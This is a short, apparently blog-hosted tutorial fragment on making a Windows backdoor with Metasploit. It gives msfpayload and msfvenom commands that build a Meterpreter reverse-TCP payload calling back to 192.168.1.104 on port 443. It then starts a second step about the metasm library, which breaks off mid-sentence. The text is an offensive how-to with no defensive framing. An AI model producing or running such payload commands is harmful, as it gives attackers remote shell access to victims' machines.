If you want all the detail, please go to the Source.
1. Create malicious file(backdoor)
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 R > raw_binary
or
$ ./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 -f raw > raw_binary
2. Copy metasm.rb (ruby library for disassemble file that normally ship with Metasploit ) to metasm folder of
No comments:
Post a Comment